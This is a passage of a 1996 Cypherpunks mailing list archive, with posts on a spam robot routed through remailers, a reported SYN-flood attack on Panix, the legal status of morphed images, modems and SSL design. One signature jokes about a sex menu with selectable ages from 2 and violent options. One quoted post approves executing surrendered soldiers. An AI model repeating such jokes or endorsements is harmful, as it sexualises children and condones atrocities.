X-Newsreader: NN version 6.5.0 #8 (NOV)

The Cypherpunks gang has apparently attacked a San Francisco artist's
www site, harrassing him and mail-bombing his service provider in an
attempt to get him to drop the account. The Cpunks objected to an applett
that this artist had on one of his pages that would send a mail greeting
to people who had a *mail-to:* button on their www pages. This greeting
consisted of his URL only and went through an anon remailer.


More info and a sample of the email robot can be found at:

        http://www.hipcrime.com

--

// declan@eff.org // I do not represent the EFF // declan@well.com //





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 14 Sep 1996 05:00:17 +0800
To: "Z.B." <zachb@netcom.com>
Subject: Unrequested mail from Mr. Babayco
Message-ID: <ae5ed8fd080210046bbc@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:28 AM 9/13/96, Z.B. wrote:

>It doesn't matter if you get one or one hundred messages - both are still
>annoying as hell.  If I wanted whatever you're advertising or selling,
>I'd come look for it.  I'd prefer that you not mail me.


Mr. Babayco,

I did not request your mail to me, and I am annoyed at having received it.

I am not interested in the views you are advertising or selling, and I'd
prefer that you not mail me.

To make me whole, I demand that you send me $125 for this occurrence, and
$125 for each future occurrence.

Have a nice day.

--Timothy C. May

cc: Law firm of Canker, Sleazewell, and M. Dooza

(sauce for the gander?)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sat, 14 Sep 1996 03:02:41 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Fed appellate judge remarks re anonymity, free speech on the net
In-Reply-To: <199609130236.TAA22049@mail.pacifier.com>
Message-ID: <Pine.BSF.3.91.960913091538.6666B-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Sep 1996, jim bell wrote:

> At 05:40 PM 9/12/96 -0700, Greg Broiles wrote:
> ...
> >Kozinski also suggested that computer-generated or morphed images of
> >children involved in sexual acts may not be protected under the Constitution
> >because of ongoing trauma to the child,
> 
> Which child?  Does he understand what "computer-generated" means?
> 

Yes, he does, I think.  But I think "protected" above should read 
"prohibited."  [Note to Greg: could that be a typo?]  The key kiddie 
porn/1st amendment case (whose name escapes 
me for the moment) offered two reasons why kiddie porn could be regulated 
in the face of the first amendment.  One reason was the "on-going trauma to 
the child [victim]."In a morphed image, they is not (or at least may not be) 
an actual child victim.  Thus the "continuing trauma" rationale for 
regulation does not exist in that case. 

> >while computer-generated or morphed images of adults would be protected. 
 
Different standards frequently apply to adults and children, in spite of 
those of you who like to arm your toddlers!  :-)

> What about the "ongoing trauma" to the adults?  I smell hypocrisy.

Adults, for the most part, are supposed to take care of themselves.

EBD


> 
> >The article says that Kozinski was skeptical that he or other federal judges
> >necessarily agreed with the 3rd Circuit's ruling in _ACLU v. Reno_ (finding
> >the CDA unconstitutional). 
> >
> >Kozinski is considered relatively conservative and relatively libertarian,
> >as 9th Circuit judges go. 
> 
> Which means that he'll last just a little longer "when the cyber-revolution 
> comes."
> 
> 
> Jim Bell
> jimbell@pacifier.com
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 14 Sep 1996 05:36:49 +0800
To: cypherpunks@toad.com
Subject: Re: 260_0it
Message-ID: <199609131633.JAA01687@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:02 PM 9/13/96 GMT, John Young wrote:

>   FiTi: "Intelligent machines will take control of our lives" 
> 
>      Before long, every vehicle will be fitted with a GPS 
>      receiver, making its position known to local area 
>      traffic management systems. In the home, a financial and 
>      stock control system would automatically order food and 
>      groceries when necessary. Intelligent machines might 
>      "decide" that it would be more efficient not to order 
>      any more food - and shut you out of the house. 
> 
>      "It's more or less inevitable. Business and science will 
>      drive this to the utmost." 

"Open the garage door, HAL."

"I'm sorry, Dave, but those sirloin steaks in the refrigerator are too 
valuable for me to allow you to eat them.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 14 Sep 1996 04:48:47 +0800
To: Brian Davis <tcmay@got.net>
Subject: Re: Jury Nullification = Voting One's Conscience
Message-ID: <199609131633.JAA01693@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:39 PM 9/12/96 -0400, Brian Davis wrote:
>> Though I often condemn aspects of the American political and legal system,
>> it is true that an awful lot of things are done right.
>
>Perhaps, like democracy, it is the worst system possible, except for 
>every other system man has invented.  
>EBD 

I have to disagree with that...



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Sat, 14 Sep 1996 03:39:41 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Child Porn and Thought Crime
In-Reply-To: <v03007800ae5ca499b1f5@[207.79.65.35]>
Message-ID: <323972E0.1A72@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn wrote:
 
> I've speculated for a long time about what Thomas Jefferson might 
> say if he were around. Something like: Think liberally, but act 
> conservatively.

I think he'd say, "You people have let this place go to Hell.  I
want to be dead again."

______c_________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being,
       m5@tivoli.com * m101@io.com       *    
      <URL:http://www.io.com/~m101>      * three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Sat, 14 Sep 1996 05:20:08 +0800
To: "MacGyver" <macgyver@colphi.edu.ar>
Subject: Re: Security technical list
Message-ID: <9609131650.AA13415@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


You're soaking in it.

    Ryan

---------- Previous Message ----------
To: cypherpunks
cc: 
From: macgyver @ colphi.edu.ar ("MacGyver") @ smtp
Date: 09/06/96 09:12:20 AM
Subject: Security technical list

[pgp sign clear]
Anybody could help me to find a mail list of security,crypto,etc??

Regards







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HipCrime <robert@precipice.V-site.net>
Date: Sat, 14 Sep 1996 06:03:45 +0800
To: remailer-operators@c2.org
Subject: did you go to school?
Message-ID: <32399315.19E7@precipice.v-site.net>
MIME-Version: 1.0
Content-Type: text/plain


>>               THIN SLICES CUT FROM OUR PRECIOUS FORESTS.
>
> "OUR?" Since when did my trees become partially yours?
> JMR

JMR, it's hard to believe that your English education is SO LACKING,
that you missed the fact, that in my sentence quoted above, the word 
"ours" refers to MANKIND IN GENERAL, not me personally.

Go sit in the corner with the duncecap on, and don't come out until you
can read an 8th grade piece of literature (with full comprehension).

-- HTTP://www.HIPCRIME.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Sat, 14 Sep 1996 02:51:13 +0800
To: cypherpunks@toad.com
Subject: Thoughts about Morph Escrow Crimes
Message-ID: <9608138426.AA842634290@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) wrote:
>As the law cannot tell if an image of prurient interest started out as a
legal image of Raquel Welch or Jennifer Aniston, or started out as an
illegal image of a minor child, morph escrow will force all image
possessors and distributors to produce proof that the image started out legal.

It is not hard to imagine a future where computer modelling has reached the
stage that a real picture is not required. An obvious extension of this is a
film with computer generated actors.

Now, consider this scenario:
1) The computer generated image is "indistinguishable" from reality.
2) The computer generated image depicts something considered obscene or illegal
under present laws (e.g. pedophilia).

At some point in the future it would seem possible that the computer generated
image will be treated as a real image under the law (and evaluated accordingly)
because it is indistinguishable from a real image.

Or perhaps we will take the other tack and simply say: What is truth?

I'm not quite ready to wash my hands on this issue.

James

Welcome to MorphSex - Fulfilling your fantasies - Painlessly.
Select Gender [M/F/H]:
Select Age [2-80]:
Options: [Orgasm/Suffocation/Dismemberment/Disembowlment/Ennui]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 14 Sep 1996 06:26:33 +0800
To: cypherpunks@toad.com
Subject: Re: 56 kbps modems
Message-ID: <ae5ee3da0b021004f935@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:24 PM 9/13/96, Enzo Michelangeli wrote:
>On Fri, 13 Sep 1996, Asgaard wrote:
>
>> >U.S. Robotics and Rockwell International are planning new modems with
>> >speeds up to 56 kbps a second, almost double the speed of the fastest
>> >rate now available.  The new devices should be available by the end of
>> >the year, although their top speed initially may be less than 56 kbps.
>> >(Wall Street Journal 12 Sep 96 B11)
>>
>> People who seemed to know used to say that 'the Shannon limit'
>> set an absolute upper limit around 40 kbps. Has Shannon been
>> proven wrong, or what?
>
>Well, it all depends on the signal-to-noise ratio. Also, if the noise is
>not white gaussian the situation can be even better.

No, this is not what's important in this case.

(Besides, the "upper limit" is really more about the Nyquist Limit.
Shannon's Theorem says that even in the presence of noise, this limit can
be approached if proper coding schemes and whatnot are used.)

While it is true that a noisy channel can reduce the effective channel
capacity to something less than its capacity (for some particular coding
scheme), the upper limit on channel capacity is whatever it is.

As to the original question about modems and 40 kbps vs. 56 kpbs rates,
this depends on "tricks" involving definitions of a "symbol" (a la the
familiar argument about baud vs. bits per second). "Trellis coding," for
example.

I'm not a modem designer, but I'm not surprised to see these incremental
improvements...none involve huge gains, and  none involve getting, say, a
megabit per second through a 6 kHz (or whatever) audio line--now that
_would_ violate Shannon's Theorem, the Nyquist Limit, etc.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com
Date: Sat, 14 Sep 1996 03:30:55 +0800
To: cypherpunks@toad.com
Subject: Re: PANIX.COM down: denial of service attack
Message-ID: <199609131413.KAA02012@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain



> From cypherpunks-errors@toad.com Thu Sep 12 18:16:43 1996
> Date: Thu, 12 Sep 1996 09:09:18 -0700
> From: #6 <thevillage@void.gov>
> X-Mailer: Mozilla 2.01 (Win95; U)
> Mime-Version: 1.0
> To: cypherpunks@toad.com
> Subject: PANIX.COM down: denial of service attack
> Content-Type> : > text/plain> ; > charset=us-ascii> 
> Content-Transfer-Encoding: 7bit
> Sender: owner-cypherpunks@toad.com
> Content-Length: 969
> 
> WSJ 9/12/96
> 
> Paraphrasing:
> 
> Panix has been under attack for the last week by someone flooding
> their server with bogus "requests for information" [see below] ...
> 
> The attack(s):
> 
> * "Have rendered almost defenseless the small NY company"
> * "...began late Friday afternoon ... were still continung yesterday"
> * have targeted "computers that control WWW pages, store e-mail, and 
> still others that link Internet addresses to Panix subscribers."
> 
> "The hacker [sic] has been sending up to 150 requests a second to 
> Panix's computers, seeking to establish a connection ... the requests, 
> presumably generated by a malicious computer program, contain fake 
> Internet addresses, which the computer must sort out before they can 
> discard them.  The computers have choked under the deluge."
> 
> "As to who might be targeting Panix, the firm's Mr. Rosen speculated it 
   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

It could, of course, also be someone, from a set of several million, that
find Mr. Rosen to be such as odious prick that they did it just to drive him
out of their misery. Just thinking out loud..


> could be someone upset by the fact that the site hosts, free, the Web 
> site for Voters Telecommunication Watch...."
>

	-paul
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 14 Sep 1996 11:52:26 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: China joins Singapore, Germany, ....
In-Reply-To: <i2P2TD1w165w@bwalk.dm.com>
Message-ID: <32399C94.23FD@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM wrote:
> Duncan Frissell <frissell@panix.com> writes:
> At 04:41 AM 9/9/96 -0700, Timothy C. May wrote:
> Prison sentences in Germany for those who reveal forbidden information
> about "the Holocaust,"
> In a country where you get 10 months for stabbing a famous tennis star 
> in the back, prison isn't much of a penalty.
> I'm sure the sentense would have been different if she weren't a
> Slavic untermensch, or if he were, say, a Turk.
> A friend of mine related how his father - a Jew and a Soviet Army
> officer - commanded a company in WW2. In 1944 they came across a > 
> church where over a thousand Nazi soldiers surrendered without 
> reistance. He announced them "Ich
> bin ain Jude" and had them all executed. I think he did the right
> thing.
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 
> 14.4Kbps

First of all, soldiers are just the little guys, like you and me, no 
more "Nazis" than "Communists" or whatever we Americans are in the eyes 
of the third world, etc.

Remember the Godfather scene where Al Pacino is walking through the town 
in Sicily and he says "where are all the men?"? You can "justify" 
revenge all you want, and what do you get? Honor? Justice?

You get a lot of dead people, and in the next generation, nobody gives a 
shit. Oh, they "continue" the mindless hatred of earlier generations, 
spurred on by (take your pick here), but you can't really connect the 
issues seamlessly across generations, unless you simplify them in the 
extreme, such as "starvation and deprivation are a causative factor in 
war", or some such thing. Economic opportunity is certainly a leading 
cause in war and genocide, i.e., in a "free" world society, it should be 
easier to remove a profit motive than to remove starvation, if you know 
what I mean, and I think you do.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 14 Sep 1996 12:03:31 +0800
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: TWA 800 - Serious thread.
In-Reply-To: <2.2.32.19960910190024.007245e4@pop.ricochet.net>
Message-ID: <3239A15E.4907@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Greg Broiles wrote:
> At 03:30 PM 9/9/96 -0700, Dale Thorn wrote:
> If govt. protects its "sources and methods", however nefarious, to the
> extent that the public is never asked to assent to these methods (even
> though a few of us know about them anyway), then the public doesn't
> have to become overtly cynical about what's going on.

> But the public *is* asked to assent to those methods - your chance to 
> vote on them is known colloquially as "jury duty".
> Greg Broiles                |"Post-rotational nystagmus was the 
> subject of
> gbroiles@netbox.com         |an in-court demonstration by the People
> http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt
>                             |Studdard." People v. Quinn 580 NYS2d 
> 818,825.

I missed a lot of this being off-line for a few days. The jury 
discussion is a good one, but nowadays we have sequestering or no, 
cameras in the court or no cameras, new gag rules all the time, 
including books being published or even planning to be published, the 
"no profit" rules for convictees (or those about to be convicted), and 
don't forget the (gasp!) influential organs such as National Enquirer 
who "digitally enhance" certain photos such as Nicole Simpson, Liza 
Minelli, etc.

If there's a chance of ever cleaning up the justice system, would it 
mean a prosecution of those who promoted the Incubator Baby scam for the 
Gulf War, for example?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Sat, 14 Sep 1996 07:14:14 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: J'accuse!: Whitehouse and NSA vs. Panix and VTW
Message-ID: <199609131832.OAA17532@attrh1.attrh.att.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:58 PM 9/12/96 -0400, Robert Hettinga <rah@shipwright.com> wrote:
>I think someone should just stand right up and accuse the NSA, at the
>behest of the Whitehouse, of running a denial of service attack on Panix at
>*exactly* the time when VTW is lobbying its hardest on the PRO-CODE bill.

Let's see, 
        anon.penet.fi gets shut down (Church of Scientology),
        PRO-Code bill is being lobbied for and against,
        PANIX is attacked by TCP-spammers,
        HipCrime initiates a distributed spam against remailers,
        newspapers accuse remailers of promoting Child Pornography
        Louis Freeh's recently gotten wiretap money approved.
        Clipper-3 is trying to build an escrowed key-certification hierarchy

Could it be *conspiracy*?  Yah, sure.  But it could be just a bunch
of separate people who don't like anonymity.  (Kind of like somebody
getting stabbed twelve times at night on the Orient Express - the problem
is finding someone who _doesn't_ have a motivation to attack anonymity :-)

At least one of the newspaper articles I've read has referred to the need
for real authentication on the net to prevent the anonymity that makes
this kind of attack possible, and in particular for the major network providers
to make sure that they don't export messages with bogus addressing,
a cure that the article said would take several months to deploy.
I don't know if they were referring to IPv6, or sendmail modifications,
or router hacks, or what; the article's author seemed to think this was
about bogusly-addressed email messages rather than understanding SYNs.

Anybody for an Internet Driver's License?

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 14 Sep 1996 11:32:32 +0800
To: HipCrime <robert@precipice.v-site.net>
Subject: Re: common sense
In-Reply-To: <323896EE.3BC3@precipice.v-site.net>
Message-ID: <3239A8F4.14D4@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


HipCrime wrote:
> And rather than "dispensing drugs in clinics," why not simply
> scrap the drug laws entirely?  People have a *right* to do as
> they please with their bodies.
> Let's hear it for common sense.  It's the first decent posting I've
> seen to this list.
> -- HTTP://www.HIPCRIME.com

A question for you: In the Civil Rights era (1960's mostly), we dealt 
with the question of whether people had the "right" to not only choose 
their neighbors, but whether they could extend that logic, so once they 
move in, whether they could "enforce" the status quo by preventing other 
people from moving in if those other people didn't "fit in" somehow.

If drugs and/or other items of Vice are liberalized, there will be a 
tremendous marketing opportunity created, and new stores and new 
departments within existing stores will pop up everywhere offering the 
newly-liberalized goods and services. So my question is, since there are 
"dry" areas in the country now, where the citizens can vote to exclude 
alcohol sales, for example, will drugs, prostitution, gambling, etc. 
fall within the purvey of citizen democracy as in the "dry" county 
example, or will there be new problems with this analogy, and will any 
of those new problems relate to the Civil Rights issues I mentioned 
previously?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 14 Sep 1996 08:37:37 +0800
To: pjb@ny.ubs.com
Subject: Re: PANIX.COM down: denial of service attack
Message-ID: <3.0b15.32.19960913111921.00b03180@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:13 AM 9/13/96 -0400, pjb@ny.ubs.com wrote:
>> "As to who might be targeting Panix, the firm's Mr. Rosen speculated it 
>   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>
>It could, of course, also be someone, from a set of several million, that
>find Mr. Rosen to be such as odious prick that they did it just to drive him
>out of their misery. Just thinking out loud..

Or it could be any of the readers of 2600 (which published an article on
SYN floods in the last issue).
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 14 Sep 1996 08:17:55 +0800
To: Gary Howland <gary@systemics.com>
Subject: Re: What is this nonsense? (Anti DVD piracy chip)
Message-ID: <3.0b15.32.19960913112614.00b0da58@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:16 PM 9/13/96 +0200, Gary Howland wrote:
>Taken from a recent Edupage:
>
>> SGS-THOMSON TAKES AIM AT DVD PIRACY
>> SGS-Thomson Microelectronics has developed a computer chip that prevents
>> would-be DVD pirates from making unlawful copies of movies from digital
>> video disc players.  The chip scrambles the disk's coding if it's
duplicated
>> on a VCR.  (Investor's Business Daily 11 Sep 96 A6)
>
>Anyone know anything about this?  Sounds like nonsense to me ...

Probibly a variation on the Macrovision copy protection scheme.  Of course
they do not care that such copyprotection methods usually cause a loss in
signal quality.  (Which is why people buy laser discs in the first place.)

Hopefully it will be something that never succeeds in the marketplace.
(Although i expect it to be imposed whether the consumer wants it or not or
how bad it screws up the signal.)

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Sat, 14 Sep 1996 07:16:25 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Fed appellate judge remarks re anonymity, free speech on the net
Message-ID: <2.2.32.19960913185159.00733374@pop.ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:23 AM 9/13/96 -0400, Brian Davis wrote:
>On Thu, 12 Sep 1996, jim bell wrote:
>
>> At 05:40 PM 9/12/96 -0700, Greg Broiles wrote:
>> ...
>> >Kozinski also suggested that computer-generated or morphed images of
>> >children involved in sexual acts may not be protected under the Constitution
>> >because of ongoing trauma to the child,
>> 
>> Which child?  Does he understand what "computer-generated" means?
>> 
>
>Yes, he does, I think.  But I think "protected" above should read 
>"prohibited."  [Note to Greg: could that be a typo?]  The key kiddie 
>porn/1st amendment case (whose name escapes 
>me for the moment) offered two reasons why kiddie porn could be regulated 
>in the face of the first amendment.  One reason was the "on-going trauma to 
>the child [victim]."In a morphed image, they is not (or at least may not be) 
>an actual child victim.  Thus the "continuing trauma" rationale for 
>regulation does not exist in that case. 

This is what the article says:

"Another freedom-of-speech-related concern may be that while
computer-generated or 'morphed' Internet images of consenting adults in
sexual acts may find constitutional protections, the same may not hold if
such images use the likeness of a child because of ongoing trauma to the
child, Kozinski says." 

The only way this makes sense to me is that a child might be horrified to
find their face pasted onto the body of a 20-year old involved in sexual
activity. But this doesn't seem like a problem for criminal law to solve, it
seems like a tort law problem, and I'm still inclined to think that the
First amendment protects speech which upsets or horrifies someone.

The other rationale I see is the "child porn makes susceptible people go
molest children" argument. (And the consequently molested child would then
endure ongoing trauma.) The only difference I see between this argument and
the argument (which has been rejected in U.S. courts, as far as I know) that
adult porn makes susceptible people hurt women is the changing focus from
"woman" to "child". But I don't see a big difference between ongoing trauma
in adults and ongoing trauma in children, such that one merits special
restrictions on otherwise protected speech and one does not. But maybe
that's why I'm studying for the bar and Alex Kozinski is on the 9th circuit. :)

 
--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@ai.mit.edu
Date: Sat, 14 Sep 1996 04:50:34 +0800
To: cypherpunks@toad.com
Subject: Re: [Long] A history of Netscape/MSIE problems
In-Reply-To: <32390335.6231@netscape.com>
Message-ID: <9609131559.AA30300@etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tom wrote,

>Hallam-Baker wrote:
>> 
>> There was a long list of security holes in SSL, PCT plugged a good
>> number of them and SSL v3 plugged a few.

>This statement surprises me.  It appears to mean that you think PCT has
>fewer holes than SSL 3.0.  If you know of any holes in SSL 3.0, I'd be
>very interested in hearing about them.

Sorry Tom, should have made a bit clearer the difference between the 
pre-Weinstein/El-Gamal and post era a little better. Also what I 
meant to say was that SSLv3 plugged a few that PCT had done differently.

The remaining probnlems as I see it are of approach. The security in
SSL is not in the right layer to support collaboration. Thats not to say
its a bad thing to have SSL and SSL makes a lot more sense to me than
IP-SEC does, but then I always prefer security thats higher in the
protocol stack. SSL strikes me as a credible prospect for pervasive
low level security across all IP protocols while IP-sec would be nice
but will probably take a decade to become ubiquitous.

The problem with SSL is that using a public key based protocol to 
protect a password is something of a technology mismatch. I want
the flexibility that public key auth gives me available at the 
application level.

There is no real model for how SSL provides security in a distributed
authoring environment. If I want to distribute encrypted documents
from one server and keys from another, have an authoring tool sign
a document in a non repudiable manner and integrate that through to
the authorisation system there is not really a means to do it.

I don't think that S-HTTP helps either, its too baroque. If all one
wants to do is sign a document being transmitted in http then whats
wrong with a Content-Signature: tag? If you want to encrypt on a 
symmetric key which is known to the firewall and want the firewall
to know what is going on then whats wrong with using chunked encoding?
Similarly whats wrong with a simple MAC function signing each message
body? If one incorporates a wrapping mechanism then one can control 
the level of security in an arbitary manner, exposing or concealing
as much as one wants. I've never understood why S-HTTP needed so much
mechanism to achieve all that.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Johnson" <rjj@medialab.com>
Date: Sat, 14 Sep 1996 07:14:35 +0800
To: "Ross Wright" <rwright@adnetsol.com>
Subject: Re: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
Message-ID: <v02140b0eae5e5f382b97@[204.144.184.50]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:02 9/12/96, Ross Wright wrote to cypherpunks@toad.com and
remailer-operators@c2.org and...:
>On Or About: 12 Sep 96 at 17:48, Rabid Wombat wrote:
>> However, since others may think like you, I guess I'll have to add a line
>> above my link stating that email not related to the purpose of my site
>> will be happily proof-read at the rate of $200 per hour,
>
>Just great.  That sure takes away any anonymity you had about being
>"on the cutting edge" of the information age.  That 1952 "proof-read"
>crap went out in the 70's.  How can you hope to enforce it?  It's a
>joke, right? :)  Maybe not, since it's on your sig-line.


Hey, that was my too-long sig, Ross.  There is obviously more than one
person who disagrees with your assertion that listing an email address
somewhere is an open invitation for mail to that address on any topic or
for any purpose.

Also, I charge $500 per message.  I've always liked flat fees. :-)

------- Forwarded Message -------
At 21:50 9/11/96, Ross Wright <rwright@adnetsol.com> wrote to
cypherpunks@toad.com and remailer-operators@c2.org:
>As I said having a website invites comments.  It's like being a
>public figure.  In effect you are publishing your e-mail address.


Interesting perspective.  However, placing an email address on a web page
is by no means an offer to take "comments" (i.e., marketing spams) on
anything that strikes the spammer's fancy.

The context in which any email address is mentioned will tell you what
sorts of messages are expected at that address.  To maintain otherwise is
just a flimsy excuse for "seedy low life multi-level-marketing jerks" who
want to cover their postage-due unsolicited advertising/promotional email
in some false cloak of respectability.

To continue the comment box analogy, the stuffing of salsa sample comment
boxes (next to the salsa sample booth in the grocery store) with ads for
anything you're pushing is most decidedly not what the comment box is for.
...


--
"As the most participatory form of mass speech yet developed, the Internet
deserves the highest protection from governmental intrusion. ... Just as the
strength of the Internet is chaos, so the strength of our liberty depends
upon the chaos and cacophony of the unfettered speech the First Amendment
protects."
        -- Judge Stewart Dalzell

Unsolicited advertising/promotional email proofread for $500/message!  Your
sending such a message to me is an explicit request for my services!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 14 Sep 1996 12:05:38 +0800
To: roy@scytale.com
Subject: Re: ALPHACIPHER - An unbreakable encryption program.
In-Reply-To: <960910.071433.8A6.rnr.w165w@sendai.scytale.com>
Message-ID: <3239BADE.2B5D@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


On the below "conspiracy theory" comment:
Aren't "conspiracy theory" and "conspiracy theorist" now used as 
catch-all (and derogatory) terms by mainstream afictionados to identify 
persons and orgs they consider to be enemies of the statist point of 
view? Remember the last election when Mr. Paraniod (Perot) was running, 
and newspeople were using the term "conspiracy buff", then, when 
reminded that the mainstream folks have their own sacred conspiracies 
which they milk much money from, they (the newspeople) switched to 
"conspiracy theorist" instead.

I have to laugh when Bugliosi gets on TV ranting about how "there 
couldn't possibly be a conspiracy in the OJ murders", but how easy one 
forgets, Bugliosi gained his lasting fame from a ridiculous (seemingly) 
theory about "Helter Skelter", etc.

Roy M. Silvernail wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In alt.security, survival@aa.net writes:
> 
> [ attribution scrambled ]
> 
> >> True, but somehow I have a feeling that Alphacipher is not a one-time
> >> pad, and thus is breakable.
> >
> > This assumption is not true.  ALPHACIPHER is, indeed, based upon an OTP.
> > We've solved all of the problems associated with pad creation,
> > distribution, packaging and many other concerns that have previously
> > limited the use of a cipher in this class.
> 
> Their web page alludes to a OTP-like operation where you have to
> purchase key "refills".  It doesn't say where they store the escrowed
> copies of the key material.
> 
> > Visit our net page at http://www.aa.net/cyber-survival-hq for more
> > information, and read the reply in response to the unfounded attack by
> > Curtin, posted above.
> 
> I recommend this page, if only for the great conspiracy theory about
> automated telephone line scanning.
> - --
>            Roy M. Silvernail     [ ]      roy@scytale.com
> PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
>                 Key available from pubkey@scytale.com
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMjVcuRvikii9febJAQG1wQP+PPevphnwFiUnhwfHfi9eSLI/lJz++eaw
> X4Xo6Oa343rpnNoNw0D51aIRZbRmh9QRt1nhNbD3fPvNPjjvzxW58zgAtX5+kxfk
> b54pBzlVTEYcPBFXatfQuCjhhd95gjaMXYsKAx6rUNt02QFihGWqID48huN9nFOZ
> 0MlhN5IxIBk=
> =y4kc
> -----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@suite.suite.com (Jim Miller)
Date: Sat, 14 Sep 1996 08:05:26 +0800
To: peter.allan@aeat.co.uk
Subject: Re: really (?) undetectable crypto
Message-ID: <9609132008.AA08893@suite.com>
MIME-Version: 1.0
Content-Type: text/plain



> What about Walter making insignificant changes to the
> cleartext and replacing the hash with the new hash?  

> Because you are using an unkeyed hash (and not a sig) he can
> do that and foul up the stegomessage
>
> Walter can still play silly spooks with your stego if he breaks the 

> 40-bit encryption.


True.  The examples was just illustrative.  Given unkeyed hashes or 40 bit  
encryption, Walter could also frame you by replacing your bits with ones  
